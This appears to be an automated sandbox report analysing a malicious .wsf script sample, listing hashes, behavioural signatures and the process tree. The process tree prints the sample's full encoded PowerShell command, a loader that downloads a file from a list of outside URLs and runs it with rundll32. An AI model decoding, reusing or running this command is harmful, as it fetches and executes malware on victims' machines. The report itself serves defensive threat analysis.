Analysis
-
max time kernel
52s -
max time network
30s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
11/04/2023, 23:52
Static task
static1
Behavioral task
behavioral1
Sample
SX_April.11(82046).wsf
Resource
win7-20230220-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
SX_April.11(82046).wsf
Resource
win10v2004-20230220-en
6 signatures
150 seconds
General
-
Target
SX_April.11(82046).wsf
-
Size
200KB
-
MD5
a8c1462f4cd9447e107313230a6b2e70
-
SHA1
a3be35d55d23ffca1a7ec95fc2d59173884b7ede
-
SHA256
314a563c82382bf33f0ef0f90f481c2e742a710f678872732d59a57658816d03
-
SHA512
0ec329ee2ac0b48883750cfd61fcd8dea320f48d2988d94ac2ba7e655f994b6fc3f754e6336c78de12aa595948a06e08ff0ab71f8470ce175e47995a2e6ef37a
-
SSDEEP
6144:/WGVBHfU/OQ0HGNx1YL+SNj5tj86M4B3on1TuIFRBNE9HdjUNFP:pvHf+d48Yp8iBQ1PK9HdjQ
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 932 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 932 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1136 wrote to memory of 932 1136 WScript.exe 28 PID 1136 wrote to memory of 932 1136 WScript.exe 28 PID 1136 wrote to memory of 932 1136 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SX_April.11(82046).wsf"1⤵
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7ACQAZABlAG0AZQBuAHQAaABvAGwAaQB6AGUASAB5AGIAcgBpAGQAaQB6AGUAcwAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAGMAaQBlAG4AdABpAGYAaQBjAGEAZwByAG8AdQBwAC4AYwBvAG0ALwBBAFIAdgBEAGkARQAvADYAaABYADcANwB5AEMAdgBIAEoAbwAsAGgAdAB0AHAAcwA6AC8ALwBpAGwAdQBtAGkAbgBhAHIAZQBvAGQAbwBuAHQAbwAuAGMAbwBtAC4AYgByAC8AOABLADMASQBBAC8ASwBkADkARwAwAFYANQBEAHMALABoAHQAdABwAHMAOgAvAC8AbgBvAG0AYQBkAGwAbwB2AGUALgBjAG8AbQAuAGIAcgAvAFYAUgA4AGYALwBxAHgAdQBpAFkATAB6AEcARgBXAGgAcwAsAGgAdAB0AHAAcwA6AC8ALwBpAGEAbgBqAGUAcwB1AHMAYwByAC4AbwByAGcALwAzAG4AUwBuAC8AUQBXADcAMABqAEIAMQBEAFIASwBzACwAaAB0AHQAcABzADoALwAvAGQAaQBhAGIAZQBmAGwAaQB4AC4AYwBsAHUAYgAvAFEANgBwAHkALwBRAEgATwBNAEMAeQBqAEIANQAsAGgAdAB0AHAAcwA6AC8ALwBtAGUAZABpAGMAYQBpAG4AdABsAC4AYwBvAG0ALwBDAG0AeQBIAC8AQQBaAEIAVwBTAEUANwBmAEkAWgBnAG4ALABoAHQAdABwAHMAOgAvAC8AaQBuAHMAdABpAHQAdQB0AG8AZQBrAGIAYQBsAGwAbwAuAG8AcgBnAC8ARAB1AFoAagBOAC8AZQBBAGEAdgBTAEkARgBaAHkAWQAxACwAaAB0AHQAcABzADoALwAvAGMAbwBuAGUAYwB0AGEAYgByAGEAegBpAGwAbgBlAHcAYgBhAG4AawAuAGMAbwBtAC8AdgB5AHgAQgAvAFkARgBEAGoAWQB0AEwAbwA3AGoAUgBRACwAaAB0AHQAcABzADoALwAvAGEAbABrAGEAbgBhAHIAaQBhAC0AdQBhAGUALgBjAG8AbQAvADMAaQB2AC8ASQByAGwAMwA4AEwAVwBLAHoARABMACwAaAB0AHQAcABzADoALwAvAGIAcwBkAHQAcgBlAGUAaQBuAGMALgBjAG8AbQAvADUARABZAC8ASQBMAE8ARwB3AHAAUwBjAGUAOAB4ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAHAAaQBsAG8AdABhAGcAZQBzAFMAZQBtAGkAcgBlAGwAaQBnAGkAbwB1AHMAIABpAG4AIAAkAGQAZQBtAGUAbgB0AGgAbwBsAGkAegBlAEgAeQBiAHIAaQBkAGkAegBlAHMAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAHAAaQBsAG8AdABhAGcAZQBzAFMAZQBtAGkAcgBlAGwAaQBnAGkAbwB1AHMAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADUAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAEMAZQByAGEAcgBnAHkAcgBpAHQAZQAuAEkAbgB0AG8AbgBhAHQAaQBvAG4AYQBsADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAQwBlAHIAYQByAGcAeQByAGkAdABlAC4ASQBuAHQAbwBuAGEAdABpAG8AbgBhAGwAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAAxADAAMAAwADAAMAApACAAewBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAQwBlAHIAYQByAGcAeQByAGkAdABlAC4ASQBuAHQAbwBuAGEAdABpAG8AbgBhAGwALABOAGkAawBuADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:932
-